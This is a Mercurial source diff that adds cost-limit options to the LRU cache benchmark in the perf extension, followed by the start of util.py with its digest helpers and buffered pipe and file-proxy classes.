1707 1707 [(b'C', b'clear', False, b'clear volatile cache between each call.'),
1708 1708 (b'', b'contexts', False, b'obtain changectx for each revision')]
1709 1709 + formatteropts, b"REVSET")
1710 1710 def perfrevset(ui, repo, expr, clear=False, contexts=False, **opts):
1711 1711 """benchmark the execution time of a revset
1712 1712
1713 1713 Use the --clear option if you need to evaluate the impact of building the
1714 1714 volatile revision set caches on revset execution. The volatile caches hold
1715 1715 filtering- and obsolescence-related data."""
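    # Illustrative invocations (the revsets here are arbitrary examples):
    #
    #   $ hg perfrevset 'all()'
    #   $ hg perfrevset 'draft()' --clear --contexts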
1716 1716 timer, fm = gettimer(ui, opts)
1717 1717 def d():
1718 1718 if clear:
1719 1719 repo.invalidatevolatilesets()
1720 1720 if contexts:
1721 1721 for ctx in repo.set(expr): pass
1722 1722 else:
1723 1723 for r in repo.revs(expr): pass
1724 1724 timer(d)
1725 1725 fm.end()
1726 1726
1727 1727 @command(b'perfvolatilesets',
1728 1728 [(b'', b'clear-obsstore', False, b'drop obsstore between each call.'),
1729 1729 ] + formatteropts)
1730 1730 def perfvolatilesets(ui, repo, *names, **opts):
1731 1731 """benchmark the computation of various volatile set
1732 1732
1733 1733 Volatile set computes element related to filtering and obsolescence."""
1734 1734 timer, fm = gettimer(ui, opts)
1735 1735 repo = repo.unfiltered()
1736 1736
1737 1737 def getobs(name):
1738 1738 def d():
1739 1739 repo.invalidatevolatilesets()
1740 1740 if opts[b'clear_obsstore']:
1741 1741 clearfilecache(repo, b'obsstore')
1742 1742 obsolete.getrevs(repo, name)
1743 1743 return d
1744 1744
1745 1745 allobs = sorted(obsolete.cachefuncs)
1746 1746 if names:
1747 1747 allobs = [n for n in allobs if n in names]
1748 1748
1749 1749 for name in allobs:
1750 1750 timer(getobs(name), title=name)
1751 1751
1752 1752 def getfiltered(name):
1753 1753 def d():
1754 1754 repo.invalidatevolatilesets()
1755 1755 if opts[b'clear_obsstore']:
1756 1756 clearfilecache(repo, b'obsstore')
1757 1757 repoview.filterrevs(repo, name)
1758 1758 return d
1759 1759
1760 1760 allfilter = sorted(repoview.filtertable)
1761 1761 if names:
1762 1762 allfilter = [n for n in allfilter if n in names]
1763 1763
1764 1764 for name in allfilter:
1765 1765 timer(getfiltered(name), title=name)
1766 1766 fm.end()
1767 1767
1768 1768 @command(b'perfbranchmap',
1769 1769 [(b'f', b'full', False,
1770 1770 b'Includes build time of subset'),
1771 1771 (b'', b'clear-revbranch', False,
1772 1772 b'purge the revbranch cache between computation'),
1773 1773 ] + formatteropts)
1774 1774 def perfbranchmap(ui, repo, *filternames, **opts):
1775 1775 """benchmark the update of a branchmap
1776 1776
1777 1777 This benchmarks the full repo.branchmap() call with read and write disabled.
1778 1778 """
1779 1779 full = opts.get(b"full", False)
1780 1780 clear_revbranch = opts.get(b"clear_revbranch", False)
1781 1781 timer, fm = gettimer(ui, opts)
1782 1782 def getbranchmap(filtername):
1783 1783 """generate a benchmark function for the filtername"""
1784 1784 if filtername is None:
1785 1785 view = repo
1786 1786 else:
1787 1787 view = repo.filtered(filtername)
1788 1788 def d():
1789 1789 if clear_revbranch:
1790 1790 repo.revbranchcache()._clear()
1791 1791 if full:
1792 1792 view._branchcaches.clear()
1793 1793 else:
1794 1794 view._branchcaches.pop(filtername, None)
1795 1795 view.branchmap()
1796 1796 return d
1797 1797 # order filters from smaller subsets to bigger subsets
1798 1798 possiblefilters = set(repoview.filtertable)
1799 1799 if filternames:
1800 1800 possiblefilters &= set(filternames)
1801 1801 subsettable = getbranchmapsubsettable()
1802 1802 allfilters = []
1803 1803 while possiblefilters:
1804 1804 for name in possiblefilters:
1805 1805 subset = subsettable.get(name)
1806 1806 if subset not in possiblefilters:
1807 1807 break
1808 1808 else:
1809 1809 assert False, b'subset cycle %s!' % possiblefilters
1810 1810 allfilters.append(name)
1811 1811 possiblefilters.remove(name)
1812 1812
1813 1813 # warm the cache
1814 1814 if not full:
1815 1815 for name in allfilters:
1816 1816 repo.filtered(name).branchmap()
1817 1817 if not filternames or b'unfiltered' in filternames:
1818 1818 # add unfiltered
1819 1819 allfilters.append(None)
1820 1820
1821 1821 branchcacheread = safeattrsetter(branchmap, b'read')
1822 1822 branchcachewrite = safeattrsetter(branchmap.branchcache, b'write')
1823 1823 branchcacheread.set(lambda repo: None)
1824 1824 branchcachewrite.set(lambda bc, repo: None)
1825 1825 try:
1826 1826 for name in allfilters:
1827 1827 printname = name
1828 1828 if name is None:
1829 1829 printname = b'unfiltered'
1830 1830 timer(getbranchmap(name), title=str(printname))
1831 1831 finally:
1832 1832 branchcacheread.restore()
1833 1833 branchcachewrite.restore()
1834 1834 fm.end()
1835 1835
1836 1836 @command(b'perfbranchmapload', [
1837 1837 (b'f', b'filter', b'', b'Specify repoview filter'),
1838 1838 (b'', b'list', False, b'List branchmap filter caches'),
1839 1839 ] + formatteropts)
1840 1840 def perfbranchmapread(ui, repo, filter=b'', list=False, **opts):
1841 1841 """benchmark reading the branchmap"""
1842 1842 if list:
1843 1843 for name, kind, st in repo.cachevfs.readdir(stat=True):
1844 1844 if name.startswith(b'branch2'):
1845 1845 filtername = name.partition(b'-')[2] or b'unfiltered'
1846 1846 ui.status(b'%s - %s\n'
1847 1847 % (filtername, util.bytecount(st.st_size)))
1848 1848 return
1849 1849 if filter:
1850 1850 repo = repoview.repoview(repo, filter)
1851 1851 else:
1852 1852 repo = repo.unfiltered()
1853 1853 # try once without the timer; the filter may not be cached
1854 1854 if branchmap.read(repo) is None:
1855 1855 raise error.Abort(b'No branchmap cached for %s repo'
1856 1856 % (filter or b'unfiltered'))
1857 1857 timer, fm = gettimer(ui, opts)
1858 1858 timer(lambda: branchmap.read(repo) and None)
1859 1859 fm.end()
1860 1860
1861 1861 @command(b'perfloadmarkers')
1862 1862 def perfloadmarkers(ui, repo):
1863 1863 """benchmark the time to parse the on-disk markers for a repo
1864 1864
1865 1865 Result is the number of markers in the repo."""
1866 1866 timer, fm = gettimer(ui)
1867 1867 svfs = getsvfs(repo)
1868 1868 timer(lambda: len(obsolete.obsstore(svfs)))
1869 1869 fm.end()
1870 1870
1871 1871 @command(b'perflrucachedict', formatteropts +
1872 [(b'', b'size', 4, b'size of cache'),
1872 [(b'', b'costlimit', 0, b'maximum total cost of items in cache'),
1873 (b'', b'mincost', 0, b'smallest cost of items in cache'),
1874 (b'', b'maxcost', 100, b'maximum cost of items in cache'),
1875 (b'', b'size', 4, b'size of cache'),
1873 1876 (b'', b'gets', 10000, b'number of key lookups'),
1874 1877 (b'', b'sets', 10000, b'number of key sets'),
1875 1878 (b'', b'mixed', 10000, b'number of mixed mode operations'),
1876 1879 (b'', b'mixedgetfreq', 50, b'frequency of get vs set ops in mixed mode')],
1877 1880 norepo=True)
1878 def perflrucache(ui, size=4, gets=10000, sets=10000, mixed=10000,
1879 mixedgetfreq=50, **opts):
1881 def perflrucache(ui, mincost=0, maxcost=100, costlimit=0, size=4,
1882 gets=10000, sets=10000, mixed=10000, mixedgetfreq=50, **opts):
1880 1883 def doinit():
1881 1884 for i in xrange(10000):
1882 1885 util.lrucachedict(size)
1883 1886
1887 costrange = list(range(mincost, maxcost + 1))
1888
1884 1889 values = []
1885 1890 for i in xrange(size):
1886 1891 values.append(random.randint(0, sys.maxint))
1887 1892
1888 1893 # Get mode fills the cache and tests raw lookup performance with no
1889 1894 # eviction.
1890 1895 getseq = []
1891 1896 for i in xrange(gets):
1892 1897 getseq.append(random.choice(values))
1893 1898
1894 1899 def dogets():
1895 1900 d = util.lrucachedict(size)
1896 1901 for v in values:
1897 1902 d[v] = v
1898 1903 for key in getseq:
1899 1904 value = d[key]
1900 1905 value # silence pyflakes warning
1901 1906
1907 def dogetscost():
1908 d = util.lrucachedict(size, maxcost=costlimit)
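        # Note: 'costs' is populated below under "Set mode" before any bench
        # runs; indexing costs[i] here assumes size <= sets, which holds for
        # the defaults (4 <= 10000).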
1909 for i, v in enumerate(values):
1910 d.insert(v, v, cost=costs[i])
1911 for key in getseq:
1912 try:
1913 value = d[key]
1914 value # silence pyflakes warning
1915 except KeyError:
1916 pass
1917
1902 1918 # Set mode tests insertion speed with cache eviction.
1903 1919 setseq = []
1920 costs = []
1904 1921 for i in xrange(sets):
1905 1922 setseq.append(random.randint(0, sys.maxint))
1923 costs.append(random.choice(costrange))
1906 1924
1907 1925 def doinserts():
1908 1926 d = util.lrucachedict(size)
1909 1927 for v in setseq:
1910 1928 d.insert(v, v)
1911 1929
1930 def doinsertscost():
1931 d = util.lrucachedict(size, maxcost=costlimit)
1932 for i, v in enumerate(setseq):
1933 d.insert(v, v, cost=costs[i])
1934
1912 1935 def dosets():
1913 1936 d = util.lrucachedict(size)
1914 1937 for v in setseq:
1915 1938 d[v] = v
1916 1939
1917 1940 # Mixed mode randomly performs gets and sets with eviction.
1918 1941 mixedops = []
1919 1942 for i in xrange(mixed):
1920 1943 r = random.randint(0, 100)
1921 1944 if r < mixedgetfreq:
1922 1945 op = 0
1923 1946 else:
1924 1947 op = 1
1925 1948
1926 mixedops.append((op, random.randint(0, size * 2)))
1949 mixedops.append((op,
1950 random.randint(0, size * 2),
1951 random.choice(costrange)))
1927 1952
1928 1953 def domixed():
1929 1954 d = util.lrucachedict(size)
1930 1955
1931 for op, v in mixedops:
1956 for op, v, cost in mixedops:
1932 1957 if op == 0:
1933 1958 try:
1934 1959 d[v]
1935 1960 except KeyError:
1936 1961 pass
1937 1962 else:
1938 1963 d[v] = v
1939 1964
1965 def domixedcost():
1966 d = util.lrucachedict(size, maxcost=costlimit)
1967
1968 for op, v, cost in mixedops:
1969 if op == 0:
1970 try:
1971 d[v]
1972 except KeyError:
1973 pass
1974 else:
1975 d.insert(v, v, cost=cost)
1976
1940 1977 benches = [
1941 1978 (doinit, b'init'),
1942 (dogets, b'gets'),
1943 (doinserts, b'inserts'),
1944 (dosets, b'sets'),
1945 (domixed, b'mixed')
1946 1979 ]
1947 1980
1981 if costlimit:
1982 benches.extend([
1983 (dogetscost, b'gets w/ cost limit'),
1984 (doinsertscost, b'inserts w/ cost limit'),
1985 (domixedcost, b'mixed w/ cost limit'),
1986 ])
1987 else:
1988 benches.extend([
1989 (dogets, b'gets'),
1990 (doinserts, b'inserts'),
1991 (dosets, b'sets'),
1992 (domixed, b'mixed')
1993 ])
1994
1948 1995 for fn, title in benches:
1949 1996 timer, fm = gettimer(ui, opts)
1950 1997 timer(fn, title=title)
1951 1998 fm.end()
1952 1999
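# Illustrative invocation (flag values are arbitrary examples; the command
# needs no repository):
#
#   $ hg perflrucachedict --size 100 --costlimit 5000 --mincost 1 --maxcost 100
#
# When --costlimit is nonzero, the "w/ cost limit" bench variants run in
# place of the plain gets/inserts/sets/mixed benches.
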
1953 2000 @command(b'perfwrite', formatteropts)
1954 2001 def perfwrite(ui, repo, **opts):
1955 2002 """microbenchmark ui.write
1956 2003 """
1957 2004 timer, fm = gettimer(ui, opts)
1958 2005 def write():
1959 2006 for i in range(100000):
1960 2007 ui.write((b'Testing write performance\n'))
1961 2008 timer(write)
1962 2009 fm.end()
1963 2010
1964 2011 def uisetup(ui):
1965 2012 if (util.safehasattr(cmdutil, b'openrevlog') and
1966 2013 not util.safehasattr(commands, b'debugrevlogopts')):
1967 2014 # for "historical portability":
1968 2015 # In this case, Mercurial should be 1.9 (or a79fea6b3e77) -
1969 2016 # 3.7 (or 5606f7d0d063). Therefore, '--dir' option for
1970 2017 # openrevlog() should cause failure, because it has been
1971 2018 # available since 3.5 (or 49c583ca48c4).
1972 2019 def openrevlog(orig, repo, cmd, file_, opts):
1973 2020 if opts.get(b'dir') and not util.safehasattr(repo, b'dirlog'):
1974 2021 raise error.Abort(b"This version doesn't support --dir option",
1975 2022 hint=b"use 3.5 or later")
1976 2023 return orig(repo, cmd, file_, opts)
1977 2024 extensions.wrapfunction(cmdutil, b'openrevlog', openrevlog)
@@ -1,3941 +1,3963 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import collections
21 21 import contextlib
22 22 import errno
23 23 import gc
24 24 import hashlib
25 25 import itertools
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37 import zlib
38 38
39 39 from .thirdparty import (
40 40 attr,
41 41 )
42 42 from hgdemandimport import tracing
43 43 from . import (
44 44 encoding,
45 45 error,
46 46 i18n,
47 47 node as nodemod,
48 48 policy,
49 49 pycompat,
50 50 urllibcompat,
51 51 )
52 52 from .utils import (
53 53 procutil,
54 54 stringutil,
55 55 )
56 56
57 57 base85 = policy.importmod(r'base85')
58 58 osutil = policy.importmod(r'osutil')
59 59 parsers = policy.importmod(r'parsers')
60 60
61 61 b85decode = base85.b85decode
62 62 b85encode = base85.b85encode
63 63
64 64 cookielib = pycompat.cookielib
65 65 httplib = pycompat.httplib
66 66 pickle = pycompat.pickle
67 67 safehasattr = pycompat.safehasattr
68 68 socketserver = pycompat.socketserver
69 69 bytesio = pycompat.bytesio
70 70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 71 stringio = bytesio
72 72 xmlrpclib = pycompat.xmlrpclib
73 73
74 74 httpserver = urllibcompat.httpserver
75 75 urlerr = urllibcompat.urlerr
76 76 urlreq = urllibcompat.urlreq
77 77
78 78 # workaround for win32mbcs
79 79 _filenamebytestr = pycompat.bytestr
80 80
81 81 if pycompat.iswindows:
82 82 from . import windows as platform
83 83 else:
84 84 from . import posix as platform
85 85
86 86 _ = i18n._
87 87
88 88 bindunixsocket = platform.bindunixsocket
89 89 cachestat = platform.cachestat
90 90 checkexec = platform.checkexec
91 91 checklink = platform.checklink
92 92 copymode = platform.copymode
93 93 expandglobs = platform.expandglobs
94 94 getfsmountpoint = platform.getfsmountpoint
95 95 getfstype = platform.getfstype
96 96 groupmembers = platform.groupmembers
97 97 groupname = platform.groupname
98 98 isexec = platform.isexec
99 99 isowner = platform.isowner
100 100 listdir = osutil.listdir
101 101 localpath = platform.localpath
102 102 lookupreg = platform.lookupreg
103 103 makedir = platform.makedir
104 104 nlinks = platform.nlinks
105 105 normpath = platform.normpath
106 106 normcase = platform.normcase
107 107 normcasespec = platform.normcasespec
108 108 normcasefallback = platform.normcasefallback
109 109 openhardlinks = platform.openhardlinks
110 110 oslink = platform.oslink
111 111 parsepatchoutput = platform.parsepatchoutput
112 112 pconvert = platform.pconvert
113 113 poll = platform.poll
114 114 posixfile = platform.posixfile
115 115 rename = platform.rename
116 116 removedirs = platform.removedirs
117 117 samedevice = platform.samedevice
118 118 samefile = platform.samefile
119 119 samestat = platform.samestat
120 120 setflags = platform.setflags
121 121 split = platform.split
122 122 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 123 statisexec = platform.statisexec
124 124 statislink = platform.statislink
125 125 umask = platform.umask
126 126 unlink = platform.unlink
127 127 username = platform.username
128 128
129 129 try:
130 130 recvfds = osutil.recvfds
131 131 except AttributeError:
132 132 pass
133 133
134 134 # Python compatibility
135 135
136 136 _notset = object()
137 137
138 138 def bitsfrom(container):
139 139 bits = 0
140 140 for bit in container:
141 141 bits |= bit
142 142 return bits
143 143
144 144 # Python 2.6 still has deprecation warnings enabled by default. We do not want
145 145 # to display anything to standard users, so detect if we are running tests and
146 146 # only use Python deprecation warnings in that case.
147 147 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
148 148 if _dowarn:
149 149 # explicitly unfilter our warning for python 2.7
150 150 #
151 151 # The option of setting PYTHONWARNINGS in the test runner was investigated.
152 152 # However, module name set through PYTHONWARNINGS was exactly matched, so
153 153 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
154 154 # makes the whole PYTHONWARNINGS thing useless for our usecase.
155 155 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
156 156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
157 157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
158 158 if _dowarn and pycompat.ispy3:
159 159 # silence warning emitted by passing user string to re.sub()
160 160 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
161 161 r'mercurial')
162 162 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
163 163 DeprecationWarning, r'mercurial')
164 164 # TODO: reinvent imp.is_frozen()
165 165 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
166 166 DeprecationWarning, r'mercurial')
167 167
168 168 def nouideprecwarn(msg, version, stacklevel=1):
169 169 """Issue an python native deprecation warning
170 170
171 171 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
172 172 """
173 173 if _dowarn:
174 174 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
175 175 " update your code.)") % version
176 176 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
177 177
178 178 DIGESTS = {
179 179 'md5': hashlib.md5,
180 180 'sha1': hashlib.sha1,
181 181 'sha512': hashlib.sha512,
182 182 }
183 183 # List of digest types from strongest to weakest
184 184 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
185 185
186 186 for k in DIGESTS_BY_STRENGTH:
187 187 assert k in DIGESTS
188 188
189 189 class digester(object):
190 190 """helper to compute digests.
191 191
192 192 This helper can be used to compute one or more digests given their name.
193 193
194 194 >>> d = digester([b'md5', b'sha1'])
195 195 >>> d.update(b'foo')
196 196 >>> [k for k in sorted(d)]
197 197 ['md5', 'sha1']
198 198 >>> d[b'md5']
199 199 'acbd18db4cc2f85cedef654fccc4a4d8'
200 200 >>> d[b'sha1']
201 201 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
202 202 >>> digester.preferred([b'md5', b'sha1'])
203 203 'sha1'
204 204 """
205 205
206 206 def __init__(self, digests, s=''):
207 207 self._hashes = {}
208 208 for k in digests:
209 209 if k not in DIGESTS:
210 210 raise error.Abort(_('unknown digest type: %s') % k)
211 211 self._hashes[k] = DIGESTS[k]()
212 212 if s:
213 213 self.update(s)
214 214
215 215 def update(self, data):
216 216 for h in self._hashes.values():
217 217 h.update(data)
218 218
219 219 def __getitem__(self, key):
220 220 if key not in DIGESTS:
221 221 raise error.Abort(_('unknown digest type: %s') % key)
222 222 return nodemod.hex(self._hashes[key].digest())
223 223
224 224 def __iter__(self):
225 225 return iter(self._hashes)
226 226
227 227 @staticmethod
228 228 def preferred(supported):
229 229 """returns the strongest digest type in both supported and DIGESTS."""
230 230
231 231 for k in DIGESTS_BY_STRENGTH:
232 232 if k in supported:
233 233 return k
234 234 return None
235 235
236 236 class digestchecker(object):
237 237 """file handle wrapper that additionally checks content against a given
238 238 size and digests.
239 239
240 240 d = digestchecker(fh, size, {'md5': '...'})
241 241
242 242 When multiple digests are given, all of them are validated.
243 243 """
244 244
245 245 def __init__(self, fh, size, digests):
246 246 self._fh = fh
247 247 self._size = size
248 248 self._got = 0
249 249 self._digests = dict(digests)
250 250 self._digester = digester(self._digests.keys())
251 251
252 252 def read(self, length=-1):
253 253 content = self._fh.read(length)
254 254 self._digester.update(content)
255 255 self._got += len(content)
256 256 return content
257 257
258 258 def validate(self):
259 259 if self._size != self._got:
260 260 raise error.Abort(_('size mismatch: expected %d, got %d') %
261 261 (self._size, self._got))
262 262 for k, v in self._digests.items():
263 263 if v != self._digester[k]:
264 264 # i18n: first parameter is a digest name
265 265 raise error.Abort(_('%s mismatch: expected %s, got %s') %
266 266 (k, v, self._digester[k]))
267 267
268 268 try:
269 269 buffer = buffer
270 270 except NameError:
271 271 def buffer(sliceable, offset=0, length=None):
272 272 if length is not None:
273 273 return memoryview(sliceable)[offset:offset + length]
274 274 return memoryview(sliceable)[offset:]
275 275
276 276 _chunksize = 4096
277 277
278 278 class bufferedinputpipe(object):
279 279 """a manually buffered input pipe
280 280
281 281 Python will not let us use buffered IO and lazy reading with 'polling' at
282 282 the same time. We cannot probe the buffer state and select will not detect
283 283 that data are ready to read if they are already buffered.
284 284
285 285 This class lets us work around that by implementing its own buffering
286 286 (allowing efficient readline) while offering a way to know if the buffer is
287 287 empty from the output (allowing collaboration of the buffer with polling).
288 288
289 289 This class lives in the 'util' module because it makes use of the 'os'
290 290 module from the python stdlib.
291 291 """
292 292 def __new__(cls, fh):
293 293 # If we receive a fileobjectproxy, we need to use a variation of this
294 294 # class that notifies observers about activity.
295 295 if isinstance(fh, fileobjectproxy):
296 296 cls = observedbufferedinputpipe
297 297
298 298 return super(bufferedinputpipe, cls).__new__(cls)
299 299
300 300 def __init__(self, input):
301 301 self._input = input
302 302 self._buffer = []
303 303 self._eof = False
304 304 self._lenbuf = 0
305 305
306 306 @property
307 307 def hasbuffer(self):
308 308 """True is any data is currently buffered
309 309
310 310 This will be used externally a pre-step for polling IO. If there is
311 311 already data then no polling should be set in place."""
312 312 return bool(self._buffer)
313 313
314 314 @property
315 315 def closed(self):
316 316 return self._input.closed
317 317
318 318 def fileno(self):
319 319 return self._input.fileno()
320 320
321 321 def close(self):
322 322 return self._input.close()
323 323
324 324 def read(self, size):
325 325 while (not self._eof) and (self._lenbuf < size):
326 326 self._fillbuffer()
327 327 return self._frombuffer(size)
328 328
329 329 def unbufferedread(self, size):
330 330 if not self._eof and self._lenbuf == 0:
331 331 self._fillbuffer(max(size, _chunksize))
332 332 return self._frombuffer(min(self._lenbuf, size))
333 333
334 334 def readline(self, *args, **kwargs):
335 335 if 1 < len(self._buffer):
336 336 # this should not happen because both read and readline end with a
337 337 # _frombuffer call that collapses it.
338 338 self._buffer = [''.join(self._buffer)]
339 339 self._lenbuf = len(self._buffer[0])
340 340 lfi = -1
341 341 if self._buffer:
342 342 lfi = self._buffer[-1].find('\n')
343 343 while (not self._eof) and lfi < 0:
344 344 self._fillbuffer()
345 345 if self._buffer:
346 346 lfi = self._buffer[-1].find('\n')
347 347 size = lfi + 1
348 348 if lfi < 0: # end of file
349 349 size = self._lenbuf
350 350 elif 1 < len(self._buffer):
351 351 # we need to take previous chunks into account
352 352 size += self._lenbuf - len(self._buffer[-1])
353 353 return self._frombuffer(size)
354 354
355 355 def _frombuffer(self, size):
356 356 """return at most 'size' data from the buffer
357 357
358 358 The data are removed from the buffer."""
359 359 if size == 0 or not self._buffer:
360 360 return ''
361 361 buf = self._buffer[0]
362 362 if 1 < len(self._buffer):
363 363 buf = ''.join(self._buffer)
364 364
365 365 data = buf[:size]
366 366 buf = buf[len(data):]
367 367 if buf:
368 368 self._buffer = [buf]
369 369 self._lenbuf = len(buf)
370 370 else:
371 371 self._buffer = []
372 372 self._lenbuf = 0
373 373 return data
374 374
375 375 def _fillbuffer(self, size=_chunksize):
376 376 """read data to the buffer"""
377 377 data = os.read(self._input.fileno(), size)
378 378 if not data:
379 379 self._eof = True
380 380 else:
381 381 self._lenbuf += len(data)
382 382 self._buffer.append(data)
383 383
384 384 return data
385 385
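# A minimal sketch of the buffer/polling collaboration described in the
# class docstring ('pipes' is a hypothetical list of bufferedinputpipe
# instances):
#
#   readable = [p for p in pipes if p.hasbuffer]
#   if not readable:
#       ready = poll([p.fileno() for p in pipes])
#       readable = [p for p in pipes if p.fileno() in ready]
#   for p in readable:
#       data = p.read(_chunksize)
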
386 386 def mmapread(fp):
387 387 try:
388 388 fd = getattr(fp, 'fileno', lambda: fp)()
389 389 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
390 390 except ValueError:
391 391 # Empty files cannot be mmapped, but mmapread should still work. Check
392 392 # if the file is empty, and if so, return an empty buffer.
393 393 if os.fstat(fd).st_size == 0:
394 394 return ''
395 395 raise
396 396
397 397 class fileobjectproxy(object):
398 398 """A proxy around file objects that tells a watcher when events occur.
399 399
400 400 This type is intended to only be used for testing purposes. Think hard
401 401 before using it in important code.
402 402 """
403 403 __slots__ = (
404 404 r'_orig',
405 405 r'_observer',
406 406 )
407 407
408 408 def __init__(self, fh, observer):
409 409 object.__setattr__(self, r'_orig', fh)
410 410 object.__setattr__(self, r'_observer', observer)
411 411
412 412 def __getattribute__(self, name):
413 413 ours = {
414 414 r'_observer',
415 415
416 416 # IOBase
417 417 r'close',
418 418 # closed is a property
419 419 r'fileno',
420 420 r'flush',
421 421 r'isatty',
422 422 r'readable',
423 423 r'readline',
424 424 r'readlines',
425 425 r'seek',
426 426 r'seekable',
427 427 r'tell',
428 428 r'truncate',
429 429 r'writable',
430 430 r'writelines',
431 431 # RawIOBase
432 432 r'read',
433 433 r'readall',
434 434 r'readinto',
435 435 r'write',
436 436 # BufferedIOBase
437 437 # raw is a property
438 438 r'detach',
439 439 # read defined above
440 440 r'read1',
441 441 # readinto defined above
442 442 # write defined above
443 443 }
444 444
445 445 # We only observe some methods.
446 446 if name in ours:
447 447 return object.__getattribute__(self, name)
448 448
449 449 return getattr(object.__getattribute__(self, r'_orig'), name)
450 450
451 451 def __nonzero__(self):
452 452 return bool(object.__getattribute__(self, r'_orig'))
453 453
454 454 __bool__ = __nonzero__
455 455
456 456 def __delattr__(self, name):
457 457 return delattr(object.__getattribute__(self, r'_orig'), name)
458 458
459 459 def __setattr__(self, name, value):
460 460 return setattr(object.__getattribute__(self, r'_orig'), name, value)
461 461
462 462 def __iter__(self):
463 463 return object.__getattribute__(self, r'_orig').__iter__()
464 464
465 465 def _observedcall(self, name, *args, **kwargs):
466 466 # Call the original object.
467 467 orig = object.__getattribute__(self, r'_orig')
468 468 res = getattr(orig, name)(*args, **kwargs)
469 469
470 470 # Call a method on the observer of the same name with arguments
471 471 # so it can react, log, etc.
472 472 observer = object.__getattribute__(self, r'_observer')
473 473 fn = getattr(observer, name, None)
474 474 if fn:
475 475 fn(res, *args, **kwargs)
476 476
477 477 return res
478 478
479 479 def close(self, *args, **kwargs):
480 480 return object.__getattribute__(self, r'_observedcall')(
481 481 r'close', *args, **kwargs)
482 482
483 483 def fileno(self, *args, **kwargs):
484 484 return object.__getattribute__(self, r'_observedcall')(
485 485 r'fileno', *args, **kwargs)
486 486
487 487 def flush(self, *args, **kwargs):
488 488 return object.__getattribute__(self, r'_observedcall')(
489 489 r'flush', *args, **kwargs)
490 490
491 491 def isatty(self, *args, **kwargs):
492 492 return object.__getattribute__(self, r'_observedcall')(
493 493 r'isatty', *args, **kwargs)
494 494
495 495 def readable(self, *args, **kwargs):
496 496 return object.__getattribute__(self, r'_observedcall')(
497 497 r'readable', *args, **kwargs)
498 498
499 499 def readline(self, *args, **kwargs):
500 500 return object.__getattribute__(self, r'_observedcall')(
501 501 r'readline', *args, **kwargs)
502 502
503 503 def readlines(self, *args, **kwargs):
504 504 return object.__getattribute__(self, r'_observedcall')(
505 505 r'readlines', *args, **kwargs)
506 506
507 507 def seek(self, *args, **kwargs):
508 508 return object.__getattribute__(self, r'_observedcall')(
509 509 r'seek', *args, **kwargs)
510 510
511 511 def seekable(self, *args, **kwargs):
512 512 return object.__getattribute__(self, r'_observedcall')(
513 513 r'seekable', *args, **kwargs)
514 514
515 515 def tell(self, *args, **kwargs):
516 516 return object.__getattribute__(self, r'_observedcall')(
517 517 r'tell', *args, **kwargs)
518 518
519 519 def truncate(self, *args, **kwargs):
520 520 return object.__getattribute__(self, r'_observedcall')(
521 521 r'truncate', *args, **kwargs)
522 522
523 523 def writable(self, *args, **kwargs):
524 524 return object.__getattribute__(self, r'_observedcall')(
525 525 r'writable', *args, **kwargs)
526 526
527 527 def writelines(self, *args, **kwargs):
528 528 return object.__getattribute__(self, r'_observedcall')(
529 529 r'writelines', *args, **kwargs)
530 530
531 531 def read(self, *args, **kwargs):
532 532 return object.__getattribute__(self, r'_observedcall')(
533 533 r'read', *args, **kwargs)
534 534
535 535 def readall(self, *args, **kwargs):
536 536 return object.__getattribute__(self, r'_observedcall')(
537 537 r'readall', *args, **kwargs)
538 538
539 539 def readinto(self, *args, **kwargs):
540 540 return object.__getattribute__(self, r'_observedcall')(
541 541 r'readinto', *args, **kwargs)
542 542
543 543 def write(self, *args, **kwargs):
544 544 return object.__getattribute__(self, r'_observedcall')(
545 545 r'write', *args, **kwargs)
546 546
547 547 def detach(self, *args, **kwargs):
548 548 return object.__getattribute__(self, r'_observedcall')(
549 549 r'detach', *args, **kwargs)
550 550
551 551 def read1(self, *args, **kwargs):
552 552 return object.__getattribute__(self, r'_observedcall')(
553 553 r'read1', *args, **kwargs)
554 554
555 555 class observedbufferedinputpipe(bufferedinputpipe):
556 556 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
557 557
558 558 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
559 559 bypass ``fileobjectproxy``. Because of this, we need to make
560 560 ``bufferedinputpipe`` aware of these operations.
561 561
562 562 This variation of ``bufferedinputpipe`` can notify observers about
563 563 ``os.read()`` events. It also re-publishes other events, such as
564 564 ``read()`` and ``readline()``.
565 565 """
566 566 def _fillbuffer(self):
567 567 res = super(observedbufferedinputpipe, self)._fillbuffer()
568 568
569 569 fn = getattr(self._input._observer, r'osread', None)
570 570 if fn:
571 571 fn(res, _chunksize)
572 572
573 573 return res
574 574
575 575 # We use different observer methods because the operation isn't
576 576 # performed on the actual file object but on us.
577 577 def read(self, size):
578 578 res = super(observedbufferedinputpipe, self).read(size)
579 579
580 580 fn = getattr(self._input._observer, r'bufferedread', None)
581 581 if fn:
582 582 fn(res, size)
